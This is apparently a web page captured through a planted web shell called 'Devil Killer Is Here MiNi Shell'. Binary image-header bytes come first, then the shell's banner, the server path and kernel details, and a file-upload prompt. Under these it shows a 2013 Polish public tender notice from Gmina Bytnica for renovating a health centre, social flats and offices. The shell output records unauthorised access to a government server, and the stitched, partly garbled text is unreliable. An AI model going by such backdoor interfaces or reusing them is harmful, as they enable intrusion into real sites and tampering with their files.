JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130227/81232-N-2013.html

<p class="kh_header"><b>Bytnica: Remont Ośrodka Zdrowia, lokalu mieszkalnego z przeznaczeniem na lokale socjalne oraz biura po posterunku policji z przeznaczeniem na biura dla OPS w miejscowości Bytnica, gmina Bytnica</b><br>
<b>Numer ogłoszenia: 81232 - 2013; data zamieszczenia: 27.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytnica , Bytnica 52, 66-630 Bytnica, woj. lubuskie, tel. 0-68 3915796, faks 0-68 3915888.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Ośrodka Zdrowia, lokalu mieszkalnego z przeznaczeniem na lokale socjalne oraz biura po posterunku policji z przeznaczeniem na biura dla OPS w miejscowości Bytnica, gmina Bytnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - Remont pomieszczeń ambulatorium niepublicznego zakładu podstawowej opieki zdrowotnej na parterze budynku nr 125 w miejscowości Bytnica

Przedmiotem niniejszego zadania są roboty remontowe istniejących pomieszczeń budynku zakładu podstawowej opieki zdrowotnej w Bytnicy nr 125.
Pomieszczenia remontowane znajdują się na parterze obiektu z odrębnym wejściem.
Do wykonania projektuje się roboty remontowe w zakresie jn., tj. należy:
- zamontować dodatkowe drzwi pełne 90x200 między gabinetem lekarskim i gabinetem zabiegowym z punktem szczepień, zamurować przejście między gabinetem przygotowawczo-zabiegowym a komunikacją i przejście do budynku gospodarczego w celu wydzielenia wszystkich pomieszczeń,
- we wszystkich pomieszczeniach założyć wykładzinę typu TARKET odporną na zabrudzenia krwią i środki dezynfekcyjne (homogeniczna gr.2,0mm, grupa ścieralności P, waga 3150g/m2), zgrzewaną na łączeniach i wywinięciem na ściany, z demontażem istniejących wykładzin podłogowych-linoleum i wyrównaniem podłóg zaprawą samopoziomującą w celu likwidacji progów w otworach drzwiowych, w pomieszczeniach WC, w pomieszczeniu porządkowym, rejestracji i komunikacji płytki ceramiczne gresowe antypoślizgowe jasne            z cokolikiem wysokości nie mniej niż 10cm,
- w gabinecie zabiegowym z punktem szczepień ułożyć okładziny ceramiczne na ścianach na pełnej wysokości pomieszczeń, w pomieszczeniach WC i porządkowym okładziny ceramiczne ścian do wysokości 2,0m, w pomieszczeniach gdzie zamontowane są umywalki wykonać fartuch z płytek ceramicznych wysokości 1,60m i 0,60cm poza obrys umywalki,
- w gabinecie zabiegowym z punktem szczepień zamontować baterię bezdotykową przy umywalce, z demontażem baterii istniejącej i montażem podgrzewaczy elektrycznych c.w.u. podumywalkowych,
- w gabinecie zabiegowym z punktem szczepień, gabinecie dentystycznym                              i pomieszczeniu porządkowym zamontować zlew z baterią i montażem podgrzewaczy elektrycznych c.w.u. podumywalkowych,
- obok umywalek we wszystkich pomieszczeniach zamontować pojemnik na płyn do dezynfekcji rąk i mydło w płynie oraz pojemnik na papierowe ręczniki jednorazowe oraz kosz,
- zamontować we wszystkich pomieszczeniach kratki wentylacji grawitacyjnej z nawietrzakami, w pomieszczeniach WC zamontować wentylatory elektryczne (zapewniające wymianę 50m3/h) uruchamiane łącznie z oświetleniem,
- wykonać pomieszczenie ustępu dla pacjentów z dostosowaniem dla osób niepełnosprawnych, wykonać pomieszczenie ustępu dla personelu przy pomieszczeniu socjalnym dla personelu,
- wymienić wszystkie okna drewniane skrzynkowe na okna z profili PCV (o współczynniku nie więcej niż K=1,1 W/m2K z nawiewnikami higrosterowalnymi, zachowując podział i rysunek okien) z wymianą parapetów wewnętrznych z płyty postformingowej i zewnętrznych z blachy powlekanej i wyprawieniem ościeży zewnętrznych i wewnętrznych okien,
- wymienić drzwi zewnętrzne wejściowe na drzwi z profili PCV z naświetlem, (z zamkiem rolkowym i uchwytem z dwoma zamkami), zamontować nad drzwiami wejściowymi daszek lukowy z poliwęglanu komorowego o wym.200x75cm,
- wymienić wszystkie drzwi wewnętrzne, z wykuciem starych ościeżnic, założeniem nowych ościeżnic stalowych FD1 i założeniem nowych drzwi płycinowych konfekcjonowanych            w kolorze bukowym jasnym, do pomieszczeń WC i pom. czystościowego zaopatrzone              w kratkę nawiewną zamocowaną dołem (o wymiarach podanych na rysunku nr 2),
- wymienić drzwi wejściowe do zakładu od strony klatki schodowej mieszkalnej na stalowe ppoż. ocieplone,
- wymienić całą instalacje podtynkową elektryczną oświetleniową i gniazd wtykowych              z wymianą opraw oświetleniowych (oprawy świetlówkowe 4x20W, natężenie oświetlenia      500 lx w) gabinetach lekarskich, zabiegowych i rejestracji,
- wymienić wszystkie grzejniki żeliwne na grzejniki przeznaczone do stosowania w obiektach służby zdrowia PURMO Hygiene w kolorze białym, z zaworami termostatycznymi z zabudową pionów,
- montaż ścianki działowej z profili ocynkowanych gr 10cm obłożonych płytami GKB gr 12,5mm, wypełnionych wełną mineralną gr 5cm wydzielających poszczególne pomieszczenia,
- malowanie ścian i sufitów we wszystkich pomieszczeniach farbami nienasiąkliwymi z atestem do stosowania w służbie zdrowia,
- w pomieszczeniu gabinetu lekarskiego, w gabinecie zabiegowym z punktem szczepień             i gabinetu dentystycznego zamontować lampy bakteriobójcze naścienne, przepływowe, zasięg lampy 10-20m2, dezynfekowna kubatura 25-50m3, wydajność 132m2/h, moc 60W (np. NBVE 60N firmy ULTRA-VIOL),
- odpady medyczne niebezpieczne przechowywane będą w urządzeniu chłodniczym                  i odbierane przez firmę upoważnioną,
- pojemnik na brudną bieliznę znajdować  będzie się w pomieszczeniu porządkowym,
- nad drzwiami wejściowymi zamontować kurtynę powietrzną o długości do 120cm, moc grzewcza do 6,0 kV.

Zadanie nr 2 - Remont istniejących pomieszczeń biurowych byłego posterunku policji na pomieszczenia biurowe OPS w Bytnicy nr 130

Przedmiotem niniejszego zadania są roboty remontowe istniejących pomieszczeń biurowych byłego posterunku policji na pomieszczenia biurowe OPS w Bytnicy nr 130.
Pomieszczenia remontowane znajdują się na parterze obiektu z odrębnym wejściem.
Do wykonania projektuje się roboty remontowe w zakresie robót jn. , tj. należy:
- zdjąć istniejące wykładziny PCV z podłóg, wywieźć i utylizować, wykonać warstwy wyrównawcze z płyt OSB 25mm ułożyć wykładziny PCV z listwami, w korytarzu i pom. WC posadzka z płytek gresowych z cokolikami, 
- wykuć istniejące drzwi zewnętrzne, osadzić nowe drzwi wejściowe i z wiatrołapu z zamkiem rolkowym, pochwytem, samozamykaczem, dwoma zamkami, z szybą bezpieczną, dołem płycina, w kolorze ciemny orzech (dopasować kolor do drzwi wewnętrznych) 90/200,
- wykuć stare ościeżnice, założyć ościeżnice drewniane regulowane i nowe drzwi PORTA           w kolorze ciemnym, 
- wykuć i wstawić kratki wentylacyjne w każdym pomieszczeniu,
- wymienić istniejącą stolarkę okienną na PCV, wykuć zamurowane otwory okienne, osadzić nowe okna, parapety z płyty POLFORMING, wymienić obróbki blacharskie, zdemontować kraty okienne,
- wyburzyć ściankę w WC, zdemontować przybory sanitarne i podgrzewacz wody, wykonać nową ściankę działową do pełnej wysokości pomieszczenia, założyć nowe ościeżnice stalowe       i skrzydła z zamkami łazienkowymi, zamontować, nowe podejścia i piony kanalizacyjne z rur PCV, zamontować nowe przybory sanitarne i podumywalkowy elektryczny podgrzewacz wody, założyć wodomierz,
- wydzielić pomieszczenia biurowe ściankami w technologii suchych tynków,
- skuć tynki ścian i założyć nowe cem-wap. kat. III w pom. 7, całość ścian i sufitów w lokalach zmyć, 1xkrotnie szpachlować, malować 2xkrotnie farbami emulsyjnymi w kolorach jasnych ściany, sufity w kolorze białym, w pom. 6 i 7 do wysokości 2,0 założyć tynk kamyczkowy           w kolorze jasnym,
- zamontować w pomieszczeniach biurowych grzejniki elektryczne konwektorowe,
- ułożyć nową instalację elektryczną, wymienić oprawy oświetleniowe na jarzeniowe, 
z odrębnym zabezpieczeniem i pomiarem,
- wykonać podjazd dla niepełnosprawnych, poszerzyć schody, nawierzchnie wyłożyć płytkami gresowymi antypoślizgowymi, zamontować balustrady stalowe, nad wejściem zamontować daszek z płyt poliwęglanowych,
- wykonać sieć komputerową.

Zadanie nr 3 - Remont istniejącego lokalu mieszkalnego na I-piętrze budynku mieszkalnego      i podział na cztery odrębne lokale socjalne w Bytnicy nr 125

Przedmiotem niniejszego zadania są roboty remontowe istniejącego lokalu mieszkalnego na  I-piętrze budynku mieszkalnego i podział mieszkania na cztery odrębne lokale socjalne         w Bytnicy nr 125.
Do wykonania projektuje się roboty remontowe w zakresie jn., tj. należy:
- zdjąć istniejące wykładziny PCV z podłóg, wywieźć i utylizować, wykonać warstwy wyrównawcze i założyć wykładziny PCV z listwami, w korytarzu i pom. WC posadzka z płytek gresowych z cokolikami, 
- wykuć istniejące drzwi zewnętrzne, osadzić nowe drzwi wejściowe z klatki schodowej metalowe 80/200, przekuć nowe otwory drzwiowe między pom.1Ai 1B,2A i 2B, osadzić nowe ościeżnice stalowe ze skrzydłami szklonymi 80/200, osadzić nowe skrzydła drzwiowe wejściowe do lokali pełne 80/200 z okuciami i zamkiem patentowym, drzwi w okleinie syntetycznej drewnopodobnej w kolorze ciemnym,
- zamurować otwory drzwiowe między pomieszczeniami 1B i 2A, 2B i 3B, uzupełnić tynk cem-wap kat. III,
- wykuć i wstawić kratki wentylacyjne w każdym pomieszczeniu,
- opalić i pomalować  2xkrotnie stolarkę okienną  i parapety, wyregulować i spasować wszystkie skrzydła okienne  drewniane, zdjąć stare obróbki blacharskie okien, podkuć, wylać nowe spadki i założyć nowe obróbki blacharskie,
- wyburzyć ściankę w WC, zdemontować przybory sanitarne i podgrzewacz wody, wykonać nową ściankę działową do pełnej wysokości pomieszczenia, założyć nowe ościeżnice stalowe       i skrzydła z zamkami łazienkowymi, zamontować, nowe podejścia i piony kanalizacyjne z rur PCV, zamontować nowe przybory sanitarne i prysznic, zamontować czasowy automat sterujący na monety do płatnego zużycia wody z podgrzewaczem elektrycznym przepływowym w kabinie prysznicowej, w pom. WC założyć płytki ceramiczne do wysokości 2,0m, 
- w celu uzyskania odpowiedniej ochrony cieplnej i dźwiękowej między korytarzem i pom. 1B wykonać ściankę działową obłożyć płytami suchego tynku na ruszcie metalowym z izolacją          z wełny mineralnej gr. 10cm,
- skuć tynki ścian i założyć nowe cem-wap. kat. III w pom. 1A, całość ścian i sufitów w lokalach zmyć, 1xkrotnie szpachlować, gruntować 1xkrotnie, malować 2xkrotnie farbami emulsyjnymi      w kolorach jasnych ściany, sufity w kolorze białym, w pom.5 nowa olejnica malować 2xkrotnie        i szpachlować do wysokości 1,60m,
- wykonać podejścia do pionu i nową instalacji wody zimnej w bruzdach, podejścia do baterii        i zaworu czerpalnego ustępu, założyć w lokalach wodomierze zimnej wody,
- wykonać podejścia do pionu kanalizacyjnego i podejścia do muszli ustępowej i umywalki, założyć w lokalach zlewozmywaki 1-komorowe na szafkach z fartuchem z płytek 1,60x1,20m,
- pomalować istniejące grzejniki i rury co,
- ułożyć nową instalację elektryczną do każdego lokalu odrębnie z odrębnym zabezpieczeniem     i pomiarem oraz odrębną instalację elektryczną WC i oświetlenia korytarza wewnętrznego               z odrębnym zabezpieczeniem i pomiarem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy wykonawca zobowiązany jest wnieść  wadium w wysokości 9 000,00 zł (słownie: dziewięć tysięcy złotych).
2.  Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust.       6 Pzp, tj.:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy       z dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U nr 109, poz. 1158 z późn. zm.)
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:

Bank Spółdzielczy w Krośnie Odrzańskim
nr rachunku: 26 9656 0008 0009 4852 2000 0004
z podaniem tytułu:
Wadium dotyczące przetargu na zadanie pn. Remont Ośrodka Zdrowia, lokalu mieszkalnego z przeznaczeniem na lokale socjalne oraz biura po posterunku policji    z przeznaczeniem na biura dla OPS w miejscowości Bytnica, gmina Bytnica
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin (dzień i godzina) uznania kwoty na rachunku Zamawiającego.
6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert    w siedzibie Zamawiającego lub dołączyć do oferty.
7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 Pzp.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń,              o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to             z przyczyn nieleżących po jego stronie.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta    została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  określonych w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
10. Zamawiający zgodnie z art. 46 ust. 1 Pzp zwraca wadium wszystkim wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania,               z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,                     z zastrzeżeniem ust. 4a Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	wykażą, w zakresie niezbędnym do spełniania warunku wiedzy i doświadczenia, że w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali porównywalne roboty budowlane tj: wykonali, co najmniej jedną robotę budowlaną polegającą na remoncie lub budowie, przebudowie, rozbudowie budynków o wartości proporcjonalnej do wartości złożonej oferty (netto),  z podaniem  rodzaju i wartości, daty i miejsca wykonania, 
2)	udowodnią, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	potwierdzą, że do wykonania zamówienia dysponują lub będą dysponować jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - bez ograniczeń, oraz jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, t.j. do kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)	potwierdzą,  że znajdują  się  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiadają:
	- ubezpieczenie OC od odpowiedzialności cywilnej w zakresie działalności firmy Wykonawcy na minimalną sumę ubezpieczenia określoną na poziomie minimalnej wartości  zamówienia,
 - minimalną zdolność kredytową w kwocie nie mniejszej niż oferowana cena lub posiadają  na koncie firmowym środki  finansowe w kwocie nie mniejszej niż oferowana cena lub  dysponują środkami finansowymi w kwocie nie mniejszej niż oferowana cena  jako  suma  środków  finansowych   zgromadzonych  na  koncie firmowym wraz ze zdolnością kredytową.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych każda ze stron może żądać wprowadzenia istotnych zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeśli wystąpi co najmniej jedna z niżej wymienionych okoliczności:
a) w trakcie realizacji zamówienia zostanie ujawniony błąd w dokumentacji projektowej zauważony w trakcie realizacji umowy, 
b) z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone         z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą (art. 357 KC),
c) nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (ustaw, rozporządzeń), 
d) wystąpi redukcja robót objętych zamówieniem, związana z wykonaniem robót zamiennych lub wykonaniem robót dodatkowych,
